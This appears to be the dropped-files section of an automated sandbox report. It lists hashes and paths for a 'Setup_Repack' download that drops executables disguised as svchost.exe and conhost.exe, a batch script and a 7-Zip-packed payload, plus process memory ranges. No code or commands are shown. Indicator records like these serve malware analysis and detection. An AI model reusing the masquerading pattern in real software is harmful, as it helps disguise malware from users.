SHA512 095b3c0b3c5e987cac166cbcadc038604f38f8ef6750c4944aa5ec750db4c7d5d647723cf359c54d1dbbe1592f40c8e34084f426f5d0a3c69d2984dc8ddaf4a3

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\492V7EW6\Sansation_Light[1].woff2

MD5 03b45ef5f2e0c8d7272789c37168e6bf
SHA1 441a70675cc4e5e2b0da9402d2ff97984dace1c8
SHA256 aca749e481974cbe03fbea30d904bd6f16dfaa507d6ee47bab6a5a3cef196790
SHA512 9ca6d54813c866c486fc539690844fb3ddd4f7d1ae70ba307adc0abcaa6d92b506c4539cd0f72761a4485e76add85a4c98f624605704cc53811f9b0bee33a3ee

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\492V7EW6\Sansation_Regular[1].woff2

MD5 13885f2bc47772fd72e76a6e4d4a5d22
SHA1 7117261bad7c9ded3eb05eeed944ac4a353e2718
SHA256 c80832b44a2fd95c623d48077fef3cb75d620a94a1f4060809fd8f600a69d29b
SHA512 7b6eb5ab6baa7c0c1823b3624e23407b26e08a1075666b1b0ba5544db1ab52e85e6fc9e06dcc1c8aa7821a5953c49943b7a1dd9c836911723b6c8c4fff270b0a

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\492V7EW6\Sansation_Bold[1].woff2

MD5 5da25f726c0485450defdc18283a65e9
SHA1 7856843b367ea6221e679f431275cc2194eaa475
SHA256 d31bae7c25ef33e1b0a46e56738e737ed4dad1270466d7a8957377bc58ff815b
SHA512 91571cf3450883084ab00650d7afd9acc7d8c8e87d6085ee6ae96668d2ea49f3d95705cf51851935dda4c27a248a14149419e0ba211bc212d185da2766542ec8

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\X4SBNQQT.cookie

MD5 c9c7f9c3be94b6a946cb007a3baba667
SHA1 5a7a72cc5908720b8ad1a6bae017b949864e809d
SHA256 29e3b72736536164360ea10ef185c65f06908df46f03b5897191fb82332c9995
SHA512 7d55c0e3cd8e6d248641f7cd18631b3814ac738be450273942a2ae5ba7d329a7bf2ac40039206434bf4b437f68bd9d76b9b8d966b43f0b7c2f7a860cb492e2ce

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\FRYWWAU3.cookie

MD5 c9c7f9c3be94b6a946cb007a3baba667
SHA1 5a7a72cc5908720b8ad1a6bae017b949864e809d
SHA256 29e3b72736536164360ea10ef185c65f06908df46f03b5897191fb82332c9995
SHA512 7d55c0e3cd8e6d248641f7cd18631b3814ac738be450273942a2ae5ba7d329a7bf2ac40039206434bf4b437f68bd9d76b9b8d966b43f0b7c2f7a860cb492e2ce

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\XR06EITC\www.mediafire[1].xml

MD5 f76915b203d934248fd9fef1e62d7343
SHA1 9bf6d529a3a8f1ed5f071da510ca78500f3e93ac
SHA256 e9d7398499eca6f370b9d227e87e328e9442e18f1fd14c1b63978afc20bc9f31
SHA512 83a98769a8ff914a3fb0aed027e6de1e304b2307ecc2468c3cf06e48558ad720c7955ee4d4d8b436142509f5dd279c149b5f8ee33eb12b7d08d9737888f377bb

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_0748E67E80AF362FA2122F9BE8E2128E

MD5 a6adbcfbd8d01453ada1b2f2dd2cb565
SHA1 04bd5a02619be93f2118d7c8581dc318a40fb1f0
SHA256 cf4c251c041e83b2dd0d899217d4765e7d8c80b531609e24704732dafbac1662
SHA512 6f88d41177712ec1b4bffbc807fb9d3718281c48eeeb3b926cc1bde7c49c53ee670abc78e670dacafa215c356bfe63f87f8705a3d1f44fb65a3a1cc08b5facb2

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_0748E67E80AF362FA2122F9BE8E2128E

MD5 3ae4f752c5d3b5ac028434016e7028d3
SHA1 28302402a5ee827cb08dfeb169562ce798fdc3bd
SHA256 088aaebc8b4420813017606cbe903f108d2afa50494e885ac1a93550054e0cbc
SHA512 e0bccc54ab9604936cf2408e544e43562d398b5ebf5767480e3579ef085a2fbfe4a031f1fc65c2736fb604fe213af9723399c2adfe28555e5c5641483a78db3f

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\LA8JCWVO\plus[1].svg

MD5 8b9af3a8b847d2b8123af385e2275b2e
SHA1 6b2fa67acab3701a9cb54cfba491e5c4bc5639db
SHA256 f54ba065e03174f3e4ab77706fda9812a50e6b00034cecb79c5d7ad45c1d91cc
SHA512 aeb65087065a7d989bbc6fdefc9cf38825fbd72708066e1e2095e7db38a0d0db387769ce685d353e04e3a8f42dd8b0c79fdb57d2a3706093056864f2f86f6049

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 f7dcb24540769805e5bb30d193944dce
SHA1 e26c583c562293356794937d9e2e6155d15449ee
SHA256 6b88c6ac55bbd6fea0ebe5a760d1ad2cfce251c59d0151a1400701cb927e36ea
SHA512 cb5ad678b0ef642bf492f32079fe77e8be20c02de267f04b545df346b25f3e4eb98bb568c4c2c483bb88f7d1826863cb515b570d620766e52476c8ee2931ea94

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\R7LFADWO\edgecompatviewlist[1].xml

MD5 d4fc49dc14f63895d997fa4940f24378
SHA1 3efb1437a7c5e46034147cbbc8db017c69d02c31
SHA256 853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1
SHA512 cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\492V7EW6\js[1].js

MD5 d87133ba3d487d9e3deb701da6beabfc
SHA1 067548a7efefd8df98e9b4182fea9c9af586a7eb
SHA256 1bcde8e10545ad8fcf5c975ff16fc9d67002a80b97e21893b5d4878b490ba448
SHA512 62764db5928e74adb65baeb90f42e1c8f6eaff4e1711453639ca9fc1a414b4f6fe7ea477721ece1aa04db1244b6913fba6fb5df39d37dcb523c857e7a4b39d28

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\SFHKZTWF.cookie

MD5 d8a1da58617e36ab5b34ecae0f793fa7
SHA1 887668a15477027ab1f156c9d61f160591e765fb
SHA256 11e425dd3f44b92473b121e6cd5577a91ecc140879414a2994032c6e579e6a14
SHA512 8e54b4bcc40cc3e711d96d0736e3f4a99761c70c26181db788c7090f64bd543b47c1fc27b1db8390ed40b9d89a2e8b5f6b6087ec8a7c8ac2a5c02ee2c239929d

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\XR06EITC\www.mediafire[1].xml

MD5 01649b910c1b7e2f90c9aef58844f958
SHA1 33619ea74358f0aef3b90b0046c2fde5d24ac65b
SHA256 0c19622374c4960dea414c6a83b18aeeae150910bfc73ef21bca058d4d9d0c5b
SHA512 f2d7dd483039d14038cf472046d06d35407718088f7ec03c00ead15602b3c2d48bba263faf502350e74a4ce5e6ae4a40725a2af6a226b9ffa1b437c8890d377f

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\VBVN5MTE\Setup_Repack[1].zip

MD5 b05c1d4d043e5735facba8e3880e8121
SHA1 07aa778d7adc6a50f8b6e987668ff015a82cc83a
SHA256 e68450073ee80ae8c9a57cec98f26632616e4f84b29712c99d5ed1b4b96dc7fd
SHA512 31bf0e9827b3e3caba45c4d6faba19f93cb1c65f0eedaf86979eb0014ca0b61dd1acc62d277f26d155018026ab4ebe93f0b4d636d60e8848884b3301ee02e994

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\XR06EITC\www.mediafire[1].xml

MD5 ae9f4ede7101b51cf0c64936dbda1e4b
SHA1 02f8908a1db3e0edc6408f7ffa907a62f390842d
SHA256 cfdff2d561c59a7aa95ce0b01cd14f147a59e2116f625fa68c968f0a2454199b
SHA512 311243a8f8bf78e1dca3d4719c17cb464f3d0a9efaa40273f9fd229086a0eac7505fd9757468407e9ea588c5e0802fba599ad35ed84ff4d532a555cdac7683be

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\XR06EITC\www.mediafire[1].xml

MD5 ceb594f1c72d6de253b1b0ffd35ceb52
SHA1 6d32374abb3930c57bfb837ac3844d6ec67a843d
SHA256 ff53160ac6b40b29987fb1cb01ab0bb6758c31bcc9dd33a71d3ae1c7e0338d02
SHA512 60bb873a5231d3631645b91dcfa26a50e8a5ceebd663062ee6db2b8a108d2256aa277ce11bd07763a11fbb9368244c626d491be5ac30baa2ac92aea91f612b03

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\XR06EITC\www.mediafire[1].xml

MD5 6bb983bf1f0a08dfb10c585fc626d95b
SHA1 481ca5f4129d45e49c06658b5d4a134bfd394808
SHA256 fab3ccaedc19da6202e26c9a447bc8f989b49a5d4f2f007cf543aa00e671ef76
SHA512 9aae2a0a30647c62623ec68e61e2e05686447aca9b66c412c9998aebea2198f7c87818e4f3f4643ef5f29e97a94f4c6a4a83e3d1db6577bbce80270aa68870b7

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\LA8JCWVO\f[2].txt

MD5 dc00e1c539bb0dc7bcc40f80ff56eebf
SHA1 42a3f5626f0f7f8aaa7385d34285c80a005b11db
SHA256 a8441b850c7e2bfa72c090b01c2468fadb48dd4a71e97ae7b2f26f9ca238ae36
SHA512 328b6ca1c6f7f22b52c539cefb840804c0faffbb9be34bac3ef0f4e3d1c2c52d5a0117755c46d5f5053c2ce23ef462f1721bb9a858143916d80110c0f97a2743

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\0CN9UH4N\f[3].txt

MD5 e3ea43a1f51c81911fc3a2119d7f8d00
SHA1 f0b7e514e206509b1531f667aa48339cb6474760
SHA256 597e4ec7ca2b12f9150e02e04096849d6b06061b09c2d131f1d2225871eedfdf
SHA512 60707feb9dfaf1ee7d9675bd9f405d41ef973b2ede30da0a82dc19181a960e93b575b3580603f8b6549a9c2ad916d0de936922e1863f67dfe7f336d1bea5e6da

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\LA8JCWVO\UFYwWwmt[1].js

MD5 6d642fb9210c854f39bcc68a59a5e337
SHA1 431343d8d505c98362d2208ff0534670ba24d2e0
SHA256 5056305b09ad6474ea540f796c79be51d6b8e96043cb3d7bc4ef774e56765f4f
SHA512 35f58eea4f49b05e15a1ba5f8544be1aafc9f709131d24fb01cbadf2f9f0dcc326021a361a5b7bb2064acdb9665c77dc3ab90d5ffe490cccf7b2c56e70d9dfb9

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\VBVN5MTE\f[1].txt

MD5 43df87d5c0a3c601607609202103773a
SHA1 8273930ea19d679255e8f82a8c136f7d70b4aef2
SHA256 88a577b7767cbe34315ff67366be5530949df573931dd9c762c2c2e0434c5b8a
SHA512 2162ab9334deebd5579ae218e2a454dd7a3eef165ecdacc7c671e5aae51876f449de4ac290563ecc046657167671d4a9973c50d51f7faefc93499b8515992137

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\AI9PQGEV.cookie

MD5 550db96ca44651178e49716047c0cf13
SHA1 a1fd8f84730b2ecb44b5936188577447aac71190
SHA256 f2b058c0fac31783a52a4392ad6ea051f92d383341aa8ccc4aa49d0852e65c15
SHA512 9a4b86b7f818b90e342233ec521af2ace0644c188572dc49e459725af775d66ff8a4343881a38319ed9d98a9bfaa7d4b16e7af5c0218d847e627052b7ebf5ea5

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\Setup_Repack.zip.t2sbfdg.partial

MD5 7c033cb1fbee65d766ec58bb0903af1c
SHA1 d7ac98c071dd1e58b4c507ce872182c5e31d110a
SHA256 cb39ef698af54dd4d90ec8f37b7d133c971d1be1816880e78d39c2fbc1c4a612
SHA512 9e81d8db2a03d0f7b4bff7e135259bbe094bc706a1f61a03b868011edf7ca7fce9f08bb06f43a35f749d2111730750da9a8986d41f70ddfdbde6eca24bf5f783

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\VBVN5MTE\Pug[1].gif

MD5 d89746888da2d9510b64a9f031eaecd5
SHA1 d5fceb6532643d0d84ffe09c40c481ecdf59e15a
SHA256 ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
SHA512 d5da26b5d496edb0221df1a4057a8b0285d15592a8f8dc7016a294df37ed335f3fde6a2252962e0df38b62847f8b771463a0124ef3f84299f262ed9d9d3cee4c

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\Setup_Repack.zip

MD5 7c033cb1fbee65d766ec58bb0903af1c
SHA1 d7ac98c071dd1e58b4c507ce872182c5e31d110a
SHA256 cb39ef698af54dd4d90ec8f37b7d133c971d1be1816880e78d39c2fbc1c4a612
SHA512 9e81d8db2a03d0f7b4bff7e135259bbe094bc706a1f61a03b868011edf7ca7fce9f08bb06f43a35f749d2111730750da9a8986d41f70ddfdbde6eca24bf5f783

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\Setup_Repack.zip

MD5 7c033cb1fbee65d766ec58bb0903af1c
SHA1 d7ac98c071dd1e58b4c507ce872182c5e31d110a
SHA256 cb39ef698af54dd4d90ec8f37b7d133c971d1be1816880e78d39c2fbc1c4a612
SHA512 9e81d8db2a03d0f7b4bff7e135259bbe094bc706a1f61a03b868011edf7ca7fce9f08bb06f43a35f749d2111730750da9a8986d41f70ddfdbde6eca24bf5f783

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\M5B3R3IL\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\VBVN5MTE\container[1].htm

MD5 6aaaf8e11a32fd37fb419e3a4ce9696c
SHA1 1fd88f2ee4de5422e0c344debefe3f2b5abb2592
SHA256 468959e93f9b4e6f07c6a8f8d0e93d8fcb37d76a8615a93ec153f5842247ba99
SHA512 748b27bdb7c7fa082d7be6c69f56dc33302105784391320a5cf960531c594097bc406fd3f4690e4cf74f4016f4d56804a4296e9bd885562eb66699e1318f7000

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\~DFB02329A98458DFBF.TMP

MD5 cd6337e1f973ab5ac40d75126c186269
SHA1 74a03974266f2d73919ab0495ec0888384bca6ec
SHA256 2c94607e822098f1a2f6e8c00da3cc9273d71f31c982fe9d108e6a394666ad23
SHA512 799676cebadce910cd741888d62f0e55647735599ae72b81601e604903d9b373b114dc3d3ca33318dd75c4906587a5f5db4b577050fc16acfa416ae923a0bb11

C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe

MD5 550be4632970872fac54908f16920d66
SHA1 3289767c2de4e2cc55d4b7c1425b0b1a0fa28e20
SHA256 f10651c80d2acfe1b9b91fd9e550bf2b929307bf66ebc3d5be98fd53a1c978e9
SHA512 509ec5b1e500182de2a0c58b30925724f0e84d6d07d133b7d5e9e5ac2fbf9573a350349b794141b38908eb8622a08f938f198f1d3e5688ddc5c1d801d9053051

C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe

MD5 550be4632970872fac54908f16920d66
SHA1 3289767c2de4e2cc55d4b7c1425b0b1a0fa28e20
SHA256 f10651c80d2acfe1b9b91fd9e550bf2b929307bf66ebc3d5be98fd53a1c978e9
SHA512 509ec5b1e500182de2a0c58b30925724f0e84d6d07d133b7d5e9e5ac2fbf9573a350349b794141b38908eb8622a08f938f198f1d3e5688ddc5c1d801d9053051

memory/4060-3559-0x0000000000400000-0x000000000043F000-memory.dmp

memory/4060-3564-0x0000000000510000-0x0000000000540000-memory.dmp

memory/4060-3566-0x0000000072F90000-0x000000007367E000-memory.dmp

memory/4060-3565-0x0000000002170000-0x0000000002176000-memory.dmp

memory/4060-3567-0x0000000004B50000-0x0000000004B60000-memory.dmp

memory/4060-3568-0x000000000A6A0000-0x000000000ACA6000-memory.dmp

memory/4060-3569-0x000000000C3C0000-0x000000000C4CA000-memory.dmp

memory/4060-3570-0x000000000C4F0000-0x000000000C502000-memory.dmp

memory/4060-3571-0x000000000C510000-0x000000000C54E000-memory.dmp

memory/4060-3572-0x000000000C6C0000-0x000000000C70B000-memory.dmp

C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\read me.txt

MD5 62e178b361f4075ed5c6fd6b628cd0c8
SHA1 f0246d6ddd9a14166b962d989f5679ed1ed484af
SHA256 cbec3b5cca68d031c59548fa8446cdefb193a6109f372f207b18852c284eed00
SHA512 711d362c08491efddc6f5c39f9101ae45e04fbbddd04f01c06bc6ebb419f7e43c30dd768d8970111e00e78b2086898a8faa49a4f886d5243c530ab1ee2ae27fb

memory/4060-3574-0x000000000AD30000-0x000000000ADA6000-memory.dmp

memory/4060-3575-0x000000000ADB0000-0x000000000AE42000-memory.dmp

memory/4060-3576-0x000000000D5D0000-0x000000000DACE000-memory.dmp

memory/4060-3577-0x000000000D010000-0x000000000D076000-memory.dmp

memory/4060-3578-0x0000000072F90000-0x000000007367E000-memory.dmp

memory/4060-3579-0x0000000004B50000-0x0000000004B60000-memory.dmp

memory/4060-3580-0x000000000DB30000-0x000000000DB80000-memory.dmp

memory/4060-3581-0x000000000DE40000-0x000000000E002000-memory.dmp

memory/4060-3582-0x000000000E010000-0x000000000E53C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 d076c4b5f5c42b44d583c534f78adbe7
SHA1 c35478e67d490145520be73277cd72cd4e837090
SHA256 2c63c61e0adaaf669c9c674edfc9081d415c05b834611944a682f120ab9559d8
SHA512 b2dfcf98695e7e40578f02a104a1c2fa1de29d13b0056d3dc4a5689168546f437bfd6acbc99e3766f94efb01bac5c908f3e80795f017e1629c97b6b1026ce638

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 d076c4b5f5c42b44d583c534f78adbe7
SHA1 c35478e67d490145520be73277cd72cd4e837090
SHA256 2c63c61e0adaaf669c9c674edfc9081d415c05b834611944a682f120ab9559d8
SHA512 b2dfcf98695e7e40578f02a104a1c2fa1de29d13b0056d3dc4a5689168546f437bfd6acbc99e3766f94efb01bac5c908f3e80795f017e1629c97b6b1026ce638

C:\Users\Admin\AppData\Local\Temp\conhost.exe

MD5 ecdb97e94c539f0be22aa0bd82739da1
SHA1 f913344f16eb5ca2b72c74efc349674945a1e400
SHA256 38e66e1c80433f2a4e16a708f8cb5e26ed32963f38664ffe398827271d7f41e6
SHA512 674dcb278af671c021943f4bbe8dcbe78308d0fd3f52a2b8b30bb8f9824e7a40cf54a9172411d2f94231dc51904c483be99feb66a7c473b0bac25de52ed794d6

C:\Users\Admin\AppData\Local\Temp\conhost.exe

MD5 ecdb97e94c539f0be22aa0bd82739da1
SHA1 f913344f16eb5ca2b72c74efc349674945a1e400
SHA256 38e66e1c80433f2a4e16a708f8cb5e26ed32963f38664ffe398827271d7f41e6
SHA512 674dcb278af671c021943f4bbe8dcbe78308d0fd3f52a2b8b30bb8f9824e7a40cf54a9172411d2f94231dc51904c483be99feb66a7c473b0bac25de52ed794d6

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 7ec1a17851445d988ecce0997436b552
SHA1 eb1ce535aeb67b215cf82e4cce1eb669ad2c3f83
SHA256 169302e6a7a3c64a00b3fd84cbc0d6afed5add9bc192d51d76240836b1b7af14
SHA512 0d0bc0e4ddf08b104b2cd39c134d1215d4a20b51db253feb9d9b10315d228f02b4f281a277836f33abe62cb0c13c7e1c48c3defec519036e091609244fb806e9

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 1743d47645f5a5d479cbd1f387b09540
SHA1 49bea1153dbb495b424468ab0e2abac1dcdc8e22
SHA256 4a9ac2596a46eebc5494a2c4cf54727a3cddf634181581c8226ea7135803d052
SHA512 74a21633042fe888ce70f1b472522265a8e62595b50124bc4da47cb90012209218588b732e9d7eb81b03281acc895dd84321a51f5265f8e6c7ac483f64551a0a

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

memory/4104-3641-0x0000000072F90000-0x000000007367E000-memory.dmp

memory/4104-3642-0x0000000000270000-0x000000000027C000-memory.dmp

memory/4104-3643-0x0000000004D20000-0x0000000004D30000-memory.dmp

memory/4104-3646-0x0000000002570000-0x000000000257A000-memory.dmp

memory/4060-3647-0x0000000072F90000-0x000000007367E000-memory.dmp

memory/4984-3650-0x0000000072F90000-0x000000007367E000-memory.dmp

memory/4984-3651-0x0000000007080000-0x00000000070B6000-memory.dmp

memory/4984-3652-0x0000000007210000-0x0000000007220000-memory.dmp

memory/4984-3653-0x0000000007850000-0x0000000007E78000-memory.dmp

memory/4984-3654-0x0000000007F50000-0x0000000007F72000-memory.dmp

memory/4984-3655-0x00000000080F0000-0x0000000008156000-memory.dmp

memory/4984-3656-0x0000000008160000-0x00000000084B0000-memory.dmp

memory/4984-3657-0x0000000008080000-0x000000000809C000-memory.dmp

memory/4984-3658-0x0000000008980000-0x00000000089CB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lwtf2wg5.0x4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4984-3676-0x0000000009920000-0x0000000009953000-memory.dmp

memory/4984-3677-0x00000000096F0000-0x000000000970E000-memory.dmp

memory/4984-3682-0x0000000009960000-0x0000000009A05000-memory.dmp

memory/4984-3683-0x0000000009C40000-0x0000000009CD4000-memory.dmp

memory/4104-3684-0x0000000072F90000-0x000000007367E000-memory.dmp

memory/4984-3685-0x0000000007210000-0x0000000007220000-memory.dmp

memory/4104-3718-0x0000000004D20000-0x0000000004D30000-memory.dmp

memory/4984-3721-0x0000000072F90000-0x000000007367E000-memory.dmp

memory/4984-3880-0x00000000073F0000-0x000000000740A000-memory.dmp

memory/4984-3885-0x00000000073E0000-0x00000000073E8000-memory.dmp

memory/4984-3901-0x0000000072F90000-0x000000007367E000-memory.dmp

memory/4104-3910-0x0000000072F90000-0x000000007367E000-memory.dmp